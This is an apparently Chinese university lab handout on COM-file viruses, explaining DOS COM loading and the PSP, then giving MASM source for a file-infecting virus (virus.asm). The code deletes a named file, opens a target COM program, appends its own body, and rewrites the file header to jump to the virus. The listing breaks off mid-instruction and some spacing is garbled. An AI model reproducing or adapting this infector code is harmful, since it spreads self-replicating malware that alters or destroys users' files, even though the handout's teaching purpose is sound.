Com病毒实验文档.docVIP

COM病毒实验 【实验目的】 1、掌握COM病毒的传播原理。 2、掌握MASM611编译工具的使用。 【实验平台】 1、MS-DOS 7.10 2、MASM611 【预备知识】 1、COM文件的特点 COM文件是DOS的一种二进制代码的可执行文件，COM文件结构比较简单，加载过程十分迅速。整个程序只有一个段。因此全部代码长度必须小于64K，其入口代码地址是CS:100H。 DOS装入COM文件时，先在内存建立一个长度为100H的程序前缀段(PSP，由DOS建立，是DOS用户程序和命令行之间的接口)，然后将整个文件装载于PSP上端，不进行重定位操作，接着将四个段地址寄存器DS(Data Segment)，CS(Code Segment)，SS(Stack Segment)，ES(Extra Segment)初始化为程序前缀段(PSP)的段地址，最后将程序的控制权交于CS:100H处。如表一所示： 地址 内容 　 XXXX:0000 PSP ← CS，DS，ES，SS XXXX:0100 程序代码 ← IP 　 数据 　 　 堆栈 ← SP 病毒执行完后恢复寄生程序原先的状态，并用JMP FAR等指令使程序再次回到CS:100H处，以确保寄生程序与PSP的一致采用保存文件头若干字节，并将第一条指令改为JMP 病毒入口”，以确保病毒最先执行.model tiny program segment assume cs:program,ds:program,ss:program,es:program org 0100h main proc near MOV DX,offset message MOV AH,09h INT 21h MOV AH,4Ch INT 21h RET message db 0dh,This a simple com program for a test,0dh,0ah,$ program ends END 代码virus.asm： CSEG SEGMENT ASSUME CS:CSEG,DS:CSEG,SS:CSEG main PROC NEAR mainstart: CALL vstart ;病毒的代码开始处 vstart: POP SI ;得到当前地址 MOV BP,SI ;保存当前地址 PUSH SI MOV AH,9 ADD SI,OFFSET message-OFFSET vstart ;显示预设字符串 MOV DX,SI INT 21h POP SI ADD SI,OFFSET yuan4byte-OFFSET vstart ;取得原程序中的前四个字节 MOV DI,100h ;目的地址 MOV AX,DS:[SI] ;开始复制 MOV DS:[DI],AX INC SI INC SI INC DI ；将yuan4byte处的4个字节复制到100处 INC DI MOV AX,DS:[SI] MOV DS:[DI],AX MOV SI,BP ;恢复地址值 ，将文件的头4个字节读入到yuan4byte处 MOV DX,OFFSET delname-OFFSET vstart ；得到文件名 ADD DX,SI MOV AH,41h INT 21h MOV DX,OFFSET filename-OFFSET vstart ;得到文件名 ADD DX,SI MOV AL,02 MOV AH,3dh ;写文件 INT 21h JC error MOV BX,AX ;文件句柄 MOV DX,OFFSET yuan4byte-OFFSET vstart ;读文件的前四个字节 ADD DX,SI MOV CX,4 MOV AH,3fh INT 21h MOV AX,4202h ;到文件尾 XOR CX,CX XOR DX,DX INT 21h MOV DI,OFFSET new4byte-OFFSET vstart ;保存要跳的地方 ADD DI,2 ADD DI,SI SUB AX,4 MOV DS:[DI],AX ADD SI,OFFSET mainstart-OFFSET vstart ;准备写入病毒 MOV DX,SI MOV vsizes,OFFSET vends-OFFSET mainstart MOV CX,vsizes MOV AH,40h INT 21h MOV SI,BP ;定位到文件头 MOV AL,0 XOR CX,CX XOR DX,DX MOV AH,42h INT 21h MOV AH,40h ;将新的文件头写入 M